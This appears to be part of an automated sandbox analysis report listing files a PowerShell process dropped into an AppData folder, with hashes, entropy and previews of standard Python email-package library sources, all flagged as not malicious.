                                                                                                                                                                                                            SHA1:263E40CBC17ACEFB7FE4D42D822B082F3619B2A5
                                                                                                                                                                                                            SHA-256:5FCEF4755A57D53B29EF1EE6CC9F4A4D3334751CC3F822AA467504B63F541075
                                                                                                                                                                                                            SHA-512:9360ADFADB5741E2F7CF83F78C4604172212E4FD551BF851BB47EE2B124D1D02BF5AF0435AE963DCE8ABFBB87A5AD7540EEB273941DD731B08A56D0C0DE680AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.5.......................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.e...d...Z.e...d...Z.d.d...Z.d.d...Z.d5d.d...Z.d.d...Z.d.d...Z d6d.d...Z!d7d.d...Z"d8d.d ..Z#d!d"..Z$d#d$..Z%d%d&..Z&d'd(..Z'd8d)d*..Z(e...d+e.j)..Z*d,d-..Z+.../d9d0d1..Z,d:d3d4..Z-d.S.);z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c....................C...s$...z.|.......W.d.S...t.y.......Y.d.S.w.).z8Return True if s contains surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s..r.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\utils.py.._has_surrogates3...s..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8774
                                                                                                                                                                                                            Entropy (8bit):4.669757481893706
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:F2gPi1IygNGhdRBp8+HAe+izJkpVkgnrVeqD6kec8ZnN2ENGKTK:F2gPimygNGhjUpBVkgkqD6n9eEh+
                                                                                                                                                                                                            MD5:DD5C15C6C8497B37895EE2DD40483EBC
                                                                                                                                                                                                            SHA1:F6ACB572029D7CD2D41625C7F0DED5B8EB6A313D
                                                                                                                                                                                                            SHA-256:154F585498454CA829DCD44BB89355FF8C7965B1B6692D1AC0293E7553DBBABD
                                                                                                                                                                                                            SHA-512:140555C8F17669C2AC624E0E354021ECAA7F4F24AC6DDA3A1DD19A74371BFCC3FC0C714061362DE84EC8456ECB3381FF6C7D328C4EF25CDA3061C90EBE273324
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""" Routines for manipulating RFC2047 encoded words.....This is currently a package-private API, but will be considered for promotion..to a public API if there is demand....."""....# An ecoded word looks like this:..#..# =?charset[*lang]?cte?encoded_string?=..#..# for more information about charset see the charset module. Here it is one..# of the preferred MIME charset names (hopefully; you never know when parsing)...# cte (Content Transfer Encoding) is either 'q' or 'b' (ignoring case). In..# theory other letters could be used for other encodings, but in practice this..# (almost?) never happens. There could be a public API for adding entries..# to the CTE tables, but YAGNI for now. 'q' is Quoted Printable, 'b' is..# Base64. The meaning of encoded_string should be obvious. 'lang' is optional..# as indicated by the brackets (they are not part of the syntax) but is almost..# never encountered in practice...#..# The general interface for a CTE decoder is that it takes the enc
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):109985
                                                                                                                                                                                                            Entropy (8bit):4.606805991203239
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:My6wjBQZNdoEVWnGINpQxx3rfxXu/6V7asGYDF9M6M:swjBMNEGOQx7vM
                                                                                                                                                                                                            MD5:BFD2F9A03D650665D9F73B7232299A1E
                                                                                                                                                                                                            SHA1:25EA36F8ABE6790512BBDE0B122B7557F6B0C4E5
                                                                                                                                                                                                            SHA-256:F14209FD00B53C97611753F167FDFEBD1C4C3F90476FBD565D1F7A0C21C4211D
                                                                                                                                                                                                            SHA-512:9120E6CAC27382A437C0ABDA195F96B2BD46A4852A1DD71C5D0DA45399FB110BBB13ED587A4A8DED99E8C3A740EBA03CDB683069185B814B5118E5CE09F5EDBA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Header value parser implementing various email-related RFC parsing rules.....The parsing methods defined in this module implement various email related..parsing rules. Principal among them is RFC 5322, which is the followon..to RFC 2822 and primarily a clarification of the former. It also implements..RFC 2047 encoded word decoding.....RFC 5322 goes to considerable trouble to maintain backward compatibility with..RFC 822 in the parse phase, while cleaning up the structure on the generation..phase. This parser supports correct RFC 5322 generation by tagging white space..as folding white space only when folding is allowed in the non-obsolete rule..sets. Actually, the parser is even more generous when accepting input than RFC..5322 mandates, following the spirit of Postel's Law, which RFC 5322 encourages...Where possible deviations from the standard are annotated on the 'defects'..attribute of tokens that deviate.....The general structure of the parser follows RFC 5322, and uses its
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18378
                                                                                                                                                                                                            Entropy (8bit):4.40867877161788
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:7rjJPsgHvi2r8ISXiCvXOHjPBDtKU2U1aQQQy1leo7T/i/u6/Gkj:7rZHv5rwXiC2HDmQs1gow
                                                                                                                                                                                                            MD5:ABB8E7D0EECA30077BEC3E11166B853D
                                                                                                                                                                                                            SHA1:13F614028F8727728DD31E98FA628297FC38C0C0
                                                                                                                                                                                                            SHA-256:4960C31F0039780F316149A3773367A3AEEC3BB17D360776334D9B9E688DA908
                                                                                                                                                                                                            SHA-512:8AB6AC0C1512FFA89D68C726144E8FABBAFBA93687F27F7F8B528BD3B2F7C492235FFEC4B0A02FE74563EB15CD3740E0FBDE39271FEC7C58146EDEFE2B13DA41
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2002-2007 Python Software Foundation..# Contact: email-sig@python.org...."""Email address parsing code.....Lifted directly from rfc822.py. This should eventually be rewritten..."""....__all__ = [.. 'mktime_tz',.. 'parsedate',.. 'parsedate_tz',.. 'quote',.. ]....import time, calendar....SPACE = ' '..EMPTYSTRING = ''..COMMASPACE = ', '....# Parse a date field.._monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',.. 'aug', 'sep', 'oct', 'nov', 'dec',.. 'january', 'february', 'march', 'april', 'may', 'june', 'july',.. 'august', 'september', 'october', 'november', 'december']...._daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']....# The timezone table does not include the military time zones defined..# in RFC822, other than Z. According to RFC1123, the description in..# RFC822 gets the signs wrong, so we can't rely on any such time..# zones. RFC1123 recommends that numeric timezone indicators b
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15447
                                                                                                                                                                                                            Entropy (8bit):4.377685393663711
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:5XWVeJxZK+08mJJV22bqcOJ5Ad/8s/4kdztLEldnD98J+Uc7XaRiZFe++GK:5XNXK+cJQedf/4M5LEXnm2F0
                                                                                                                                                                                                            MD5:0C5B89A975BB78A09F8601501DDBF037
                                                                                                                                                                                                            SHA1:949B4A68B8A9DFD7C3A4E9E04DD6C9F0DBB6D76B
                                                                                                                                                                                                            SHA-256:D9F2E3A5E277CFE874E4C47BF643497C51D3B8C4B97124B478DA23407921DAEC
                                                                                                                                                                                                            SHA-512:EA3E1E795470ACF89D61CB31A67AFD7055A3C48204371A9F62B0DADB8FF15F7B771F159DE123F53D939437B1374BA4437D945B6990A5AFAA93B5DA54154DA83B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Policy framework for the email package.....Allows fine grained feature control of how the package parses and emits data..."""....import abc..from email import header..from email import charset as _charset..from email.utils import _has_surrogates....__all__ = [.. 'Policy',.. 'Compat32',.. 'compat32',.. ]......class _PolicyBase:.... """Policy Object basic framework..... This class is useless unless subclassed. A subclass should define.. class attributes with defaults for any values that are to be.. managed by the Policy object. The constructor will then allow.. non-default values to be set for these attributes at instance.. creation time. The instance will be callable, taking these same.. attributes keyword arguments, and returning a new instance.. identical to the called instance except for those values changed.. by the keyword arguments. Instances may be added, yielding new.. instances with any non-default values from the right hand..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9777
                                                                                                                                                                                                            Entropy (8bit):4.593828888317049
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:WfEMoWDlnkHiiG+2F0wx0GTKGlq1VngbQ:WMMoWDlkHii+0wxKh9
                                                                                                                                                                                                            MD5:AF898BB7CA21756B490791A7A7F7DB15
                                                                                                                                                                                                            SHA1:59D2CC7CD4D850E2CA063055E45050488D2B7FB4
                                                                                                                                                                                                            SHA-256:8D1A1F7C18240DF34E51C32450449C5CD767C3571B553D2052A3FD6BFB77C07A
                                                                                                                                                                                                            SHA-512:3D9671001067CD9C9D41D4B693776035506862D68E83701A72E43AAAF23E7FB1645A6E117531BEAB334F3883A27F31AE348C77C376E39186E10C1B23EBED4869
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview::mod:`email` Package Architecture..=================================....Overview..--------....The email package consists of three major components:.... Model.. An object structure that represents an email message, and provides an.. API for creating, querying, and modifying a message..... Parser.. Takes a sequence of characters or bytes and produces a model of the.. email message represented by those characters or bytes..... Generator.. Takes a model and turns it into a sequence of characters or bytes. The.. sequence can either be intended for human consumption (a printable.. unicode string) or bytes suitable for transmission over the wire. In.. the latter case all data is properly encoded using the content transfer.. encodings specified by the relevant RFCs.....Conceptually the package is organized around the model. The model provides both.."external" APIs intended for use by application programs using the libra
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3678
                                                                                                                                                                                                            Entropy (8bit):4.842316082900427
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:TX74xcMNLmCZ1WReUHIUethenVZPN3rMGTHbxSJVWYKFpHMoUUbOo0M7poqB7VVE:TX6dAReUteOZ13lTWWPoUbOm7po40
                                                                                                                                                                                                            MD5:8AE63186399520CCD61E4776409065FF
                                                                                                                                                                                                            SHA1:BF485E3B3051EAC063E9C69161A542D5072759C9
                                                                                                                                                                                                            SHA-256:7E499FDEFAF71CA3DF0CBEB0B3F7B460FDB3CC86CE82CEB5842747DD1687424D
                                                                                                                                                                                                            SHA-512:51C83054EC515CC2CC1EB467E3AFBA92820B3F1CB8C4C22345EDA38B23DB74C6FF6290BCDF8E77EEADCCA2183575D70EA5C88962E3B673AC5CEC17E595022DC3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2002-2007 Python Software Foundation..# Author: Ben Gertzfield..# Contact: email-sig@python.org...."""Base64 content transfer encoding per RFCs 2045-2047.....This module handles the content transfer encoding method defined in RFC 2045..to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit..characters encoding known as Base64.....It is used in the MIME standards for email to attach images, audio, and text..using some 8-bit character sets to messages.....This module provides an interface to encode and decode both headers and bodies..with Base64 encoding.....RFC 2045 defines a method for including character set information in an..`encoded-word' in a header. This method is commonly used for 8-bit real names..in To:, From:, Cc:, etc. fields, as well as Subject: lines.....This module does not do the line wrapping or end-of-line character conversion..necessary for proper internationalized headers; it only does dumb encoding and..decoding. To deal with the
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17532
                                                                                                                                                                                                            Entropy (8bit):4.605924379555321
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:yfqAmKHv1dHdU/WNtjHo3GWnCO/H4rs5o+wqUDWzhS3zbpiukbb/Lq/PusWux9Bm:yfqpEKctLIGWcs5o1kSjblUbzsn9uokJ
                                                                                                                                                                                                            MD5:7D16C9AD3426CD9A469E85B63CD9BF58
                                                                                                                                                                                                            SHA1:11DB7CA4FC1191E3EE6053B28BDEF7C086D5EFB6
                                                                                                                                                                                                            SHA-256:BCF952E8BCA0AB984AE06E5D1C8634C7FFFF8BD1F02403BE3E870325F056D84D
                                                                                                                                                                                                            SHA-512:EAD30DC1068645991516076445C811263A18D033E6DBBF0E1903D0DA5192DC4BB0C975D44D1694E91A380A48F5ECFFDE0483B88A27939467251456F88E9D6282
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Ben Gertzfield, Barry Warsaw..# Contact: email-sig@python.org....__all__ = [.. 'Charset',.. 'add_alias',.. 'add_charset',.. 'add_codec',.. ]....from functools import partial....import email.base64mime..import email.quoprimime....from email import errors..from email.encoders import encode_7or8bit.........# Flags for types of header encodings..QP = 1 # Quoted-Printable..BASE64 = 2 # Base64..SHORTEST = 3 # the shorter of QP and base64, but only for headers....# In "=?charset?q?hello_world?=", the =?, ?q?, and ?= add up to 7..RFC2047_CHROME_LEN = 7....DEFAULT_CHARSET = 'us-ascii'..UNKNOWN8BIT = 'unknown-8bit'..EMPTYSTRING = ''.........# Defaults..CHARSETS = {.. # input header enc body enc output conv.. 'iso-8859-1': (QP, QP, None),.. 'iso-8859-2': (QP, QP, None),.. 'iso-8859-3': (QP, QP, None),.. 'iso-8859-4': (QP, QP, No
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10803
                                                                                                                                                                                                            Entropy (8bit):4.598946355386075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Nwnc3QJVGYLiVFwlTeDzS8TCoUGKVTowVP7Hmrd:NwnccVe5C8TCoSVfaZ
                                                                                                                                                                                                            MD5:B0E0936B331BCD3C5D66802F1B280EB7
                                                                                                                                                                                                            SHA1:365EFBB441E8B675A861AF54002E02F6AD0CA29F
                                                                                                                                                                                                            SHA-256:565C226D02B4C500969C3AC575E28BEE7179947B8E0DB6C7343F51A43E57B330
                                                                                                                                                                                                            SHA-512:F506CDB2F704F7FD61A5C44AD39CD9EC0888345018E0876B099114CBF63B6A9645C0465CF65427F7B4000B17573F5CFC31A4B771149BDB607B9ED9DA8CA69850
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import binascii..import email.charset..import email.message..import email.errors..from email import quoprimime....class ContentManager:.... def __init__(self):.. self.get_handlers = {}.. self.set_handlers = {}.... def add_get_handler(self, key, handler):.. self.get_handlers[key] = handler.... def get_content(self, msg, *args, **kw):.. content_type = msg.get_content_type().. if content_type in self.get_handlers:.. return self.get_handlers[content_type](msg, *args, **kw).. maintype = msg.get_content_maintype().. if maintype in self.get_handlers:.. return self.get_handlers[maintype](msg, *args, **kw).. if '' in self.get_handlers:.. return self.get_handlers[''](msg, *args, **kw).. raise KeyError(content_type).... def add_set_handler(self, typekey, handler):.. self.set_handlers[typekey] = handler.... def set_content(self, msg, obj, *args, **kw):.. if msg.get_content_m
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1855
                                                                                                                                                                                                            Entropy (8bit):4.84496401418314
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QUXt+w1Tyt2+tsJeP19tQDMD6sV1+5BUlvYBytUpvZLyZEq977t8FEHK/dm7BnZq:fXvURt0eP19W1m1hlgkqpxLsOEH7M
                                                                                                                                                                                                            MD5:C5D9853A25FF74DBD71A79494E777276
                                                                                                                                                                                                            SHA1:D31B520808C02B931F2F2EC2DC8FBCCD11C350D2
                                                                                                                                                                                                            SHA-256:1CEA37BB71B7AAC3C7ACB98CCCC2F17017F7195FFE510A96F0DACAABA856A2C6
                                                                                                                                                                                                            SHA-512:4249F3889E4B6D944B5A0E1274076313DDF48F89705F2D91B3625A6E59E3A5BE1101C83619AA0DD2B27931F77CCD1FC81ABA7F3C3FB3B5B215A4C1E5F0F365F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Encodings and related functions."""....__all__ = [.. 'encode_7or8bit',.. 'encode_base64',.. 'encode_noop',.. 'encode_quopri',.. ]......from base64 import encodebytes as _bencode..from quopri import encodestring as _encodestring.........def _qencode(s):.. enc = _encodestring(s, quotetabs=True).. # Must encode spaces, which quopri.encodestring() doesn't do.. return enc.replace(b' ', b'=20')......def encode_base64(msg):.. """Encode the message's payload in Base64..... Also, add an appropriate Content-Transfer-Encoding header... """.. orig = msg.get_payload(decode=True).. encdata = str(_bencode(orig), 'ascii').. msg.set_payload(encdata).. msg['Content-Transfer-Encoding'] = 'base64'.........def encode_quopri(msg):.. """Encode the message's payload in quoted-printable..... Also, add an appropriate Content-Transfer-Encoding head
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3848
                                                                                                                                                                                                            Entropy (8bit):4.82156900066135
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:fXWfvJ87oBWxPqDuDeSJSLd/Be7USGKRhEMLfwj3P6aLQSNf:/ivJ87IMTJUB+Xk3P6aLQSp
                                                                                                                                                                                                            MD5:8A6EE2E875D87833B092C4FFB1486680
                                                                                                                                                                                                            SHA1:3A1C424674CADA0FC0182617B0DF008633E237B1
                                                                                                                                                                                                            SHA-256:AC186C29F471F55DE3099F82B67B8B0B9EDB16E4568CB094F852373A0485D07A
                                                                                                                                                                                                            SHA-512:4D82E81C20EDFEB60411E4BE994C1C3F5EA92C9ABBBF43F3AD344852586D53C744BDDB9AE09F381E139E670EC7D97BF7859F5101F8C2DA57A9E730451409D15E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""email package exception classes."""......class MessageError(Exception):.. """Base class for errors in the email package."""......class MessageParseError(MessageError):.. """Base class for message parsing errors."""......class HeaderParseError(MessageParseError):.. """Error while parsing headers."""......class BoundaryError(MessageParseError):.. """Couldn't find terminating boundary."""......class MultipartConversionError(MessageError, TypeError):.. """Conversion to a multipart is prohibited."""......class CharsetError(MessageError):.. """An illegal charset was given."""......# These are parsing defects which the parser was able to work around...class MessageDefect(ValueError):.. """Base class for a message defect.""".... def __init__(self, line=None):.. if line is not None:.. super().__init__(line).. self.line = line....cla
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23316
                                                                                                                                                                                                            Entropy (8bit):4.1407006845201835
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:YSdO2JUUP3VCzFsoa/i0uP4Uu59MixDbBJredt0S/OkEL/Vi1gSlq5WtAZtASWG0:YSdZJxPFCRs4P4UyGi5BJiEUTb85hEF
                                                                                                                                                                                                            MD5:2D2B32601AD79A67484175EC19C73C77
                                                                                                                                                                                                            SHA1:1B31D6BB28CA6939F4F4B6AA662A1254DEA9F157
                                                                                                                                                                                                            SHA-256:F3B126E9C8E58230B0D9295B69B4940569EB003AFCBA80BA1714CA5E53F84886
                                                                                                                                                                                                            SHA-512:91C830D6D96DFD152E1E6E4D44CAFB9C5EEF1FDA482A450093143B177B902E7659153CE877695F005862F106BC0ED353A17A2CA8872087DCE6AC86143A5A6D47
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2004-2006 Python Software Foundation..# Authors: Baxter, Wouters and Warsaw..# Contact: email-sig@python.org...."""FeedParser - An email feed parser.....The feed parser implements an interface for incrementally parsing an email..message, line by line. This has advantages for certain applications, such as..those reading email messages off a socket.....FeedParser.feed() is the primary interface for pushing new data into the..parser. It returns when there's nothing more it can do with the available..data. When you have no more data to push into the parser, call .close()...This completes the parsing and returns the root message object.....The other advantage of this parser is that it will never raise a parsing..exception. Instead, when it finds something unexpected, it adds a 'defect' to..the current message. Defects are just instances that live on the message..object's .defects attribute..."""....__all__ = ['FeedParser', 'BytesFeedParser']....import re....from email i
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20708
                                                                                                                                                                                                            Entropy (8bit):4.437748397303835
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:+/9Y5kyIhAckQlrXdqMlHD4cMRVbCgWGi8aXR:+/u5UA7Q7qMtD4cgVbCLGTI
                                                                                                                                                                                                            MD5:00700DFB5C1ECFFBCE39A275BD8F12B0
                                                                                                                                                                                                            SHA1:23D15C009826BEFD86BF804A315C7AF18D37C9B6
                                                                                                                                                                                                            SHA-256:B3102DE7B076FF21F00B580CE82E1118AA38B607931A2476DC3883398275F3DD
                                                                                                                                                                                                            SHA-512:64ACEECA27E56244279A8A74507DD6F6D42A51C9313956ED29056532BFD2D3655391EB3C85BD0CABA964E73282012A9C99680D4DC3F25BD313CE1295D0334E5A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2010 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Classes to generate plain text from a message object tree."""....__all__ = ['Generator', 'DecodedGenerator', 'BytesGenerator']....import re..import sys..import time..import random....from copy import deepcopy..from io import StringIO, BytesIO..from email.utils import _has_surrogates....UNDERSCORE = '_'..NL = '\n' # XXX: no longer used by the code below.....NLCRE = re.compile(r'\r\n|\r|\n')..fcre = re.compile(r'^From ', re.MULTILINE).........class Generator:.. """Generates output from a Message object tree..... This basic generator writes the message to the given file object as plain.. text... """.. #.. # Public interface.. #.... def __init__(self, outfp, mangle_from_=None, maxheaderlen=None, *,.. policy=None):.. """Create the generator for message flattening..... outfp is the output file-like object for writing the me
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24680
                                                                                                                                                                                                            Entropy (8bit):4.391747681853325
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:7VPwrX0X1jgc2EE2HLJaAUmzfEPrD9lMPHfziN:75wrZENLEv9oz2
                                                                                                                                                                                                            MD5:EFE826EE4E05118B050E04FD44DA04E1
                                                                                                                                                                                                            SHA1:74708ECA64365EEAF6F0DB3AF06470A3136971BF
                                                                                                                                                                                                            SHA-256:8989B40D16A74E408F117AC964F0498AC807430FB16E1B41FC3783C8397AE165
                                                                                                                                                                                                            SHA-512:D505B167E8BB9D6F3250CBE4019E11952F004AB6E1691C952F1B0D7A014A2BB84316849EC4413A87EC2FD6F64FF24EE144D9DCB9A70D7E8FE5C4E19AF5847C7F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2002-2007 Python Software Foundation..# Author: Ben Gertzfield, Barry Warsaw..# Contact: email-sig@python.org...."""Header encoding and decoding functionality."""....__all__ = [.. 'Header',.. 'decode_header',.. 'make_header',.. ]....import re..import binascii....import email.quoprimime..import email.base64mime....from email.errors import HeaderParseError..from email import charset as _charset..Charset = _charset.Charset....NL = '\n'..SPACE = ' '..BSPACE = b' '..SPACE8 = ' ' * 8..EMPTYSTRING = ''..MAXLINELEN = 78..FWS = ' \t'....USASCII = Charset('us-ascii')..UTF8 = Charset('utf-8')....# Match encoded-word strings in the form =?charset?q?Hello_World?=..ecre = re.compile(r'''.. =\? # literal =?.. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset.. \? # literal ?.. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive.. \? # literal ?.. (?P<encoded>.*?) # non-greedy up
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21417
                                                                                                                                                                                                            Entropy (8bit):4.469282853795882
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Yzl1HHR1R+jCKHbASD/J72KQ5IwIe7TJetODErjzGvGdgcWArw6ZaPYKb6M3/yRJ:cfR1cDHP/Jk5L82UK6ZOYKb6Mznpjzs
                                                                                                                                                                                                            MD5:85B66267476C872AD6929809F5A2148E
                                                                                                                                                                                                            SHA1:00DAE4BF4BB8C59160838A8792540FBFF9235CCB
                                                                                                                                                                                                            SHA-256:4F35739459852F5165E594974C20077ACE4EDCF2F0C295878255D376BC0ECC2A
                                                                                                                                                                                                            SHA-512:69AB5C38DFC4BA189FDC3C344B8509C067A2B9A4A62A4ECA991FA1697571AA6F65AB66037D92C63733BFC87698CFFEC6EBD543B9859F5C35B15BD3C62B487313
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Representing and manipulating email headers via custom objects.....This module provides an implementation of the HeaderRegistry API...The implementation is designed to flexibly follow RFC5322 rules..."""..from types import MappingProxyType....from email import utils..from email import errors..from email import _header_value_parser as parser....class Address:.... def __init__(self, display_name='', username='', domain='', addr_spec=None):.. """Create an object representing a full email address..... An address can have a 'display_name', a 'username', and a 'domain'. In.. addition to specifying the username and domain separately, they may be.. specified together by using the addr_spec keyword *instead of* the.. username and domain keywords. If an addr_spec string is specified it.. must be properly quoted according to RFC 5322 rules; an error will be.. raised if it is not..... An Address object has display_name, username, doma
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2206
                                                                                                                                                                                                            Entropy (8bit):4.742106820652629
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:fXv/9Im+qoFoz0JSB+GUSRvfROul7IMbwI94gH4LqiQtC:fXHaqoFoAJQeSRh7IMbwtgYAQ
                                                                                                                                                                                                            MD5:A8141F0F87485A31CD34D98D9254CC74
                                                                                                                                                                                                            SHA1:B89AA38E7162DAD04D6864413013C25E8CBE04AF
                                                                                                                                                                                                            SHA-256:7CBB33D39388E72C408E8A64C5DDF044EF546092E6EC48BD62926CDB54E80769
                                                                                                                                                                                                            SHA-512:6E68410D8A67AE6656D9BCE4A7C81014A09C61FC9E27EBB8D38835A466172BC39447B7C2E7D91093280DCEF162C9F3EA0DA3A4EC8E70A6F597B4C92E8544FBD0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
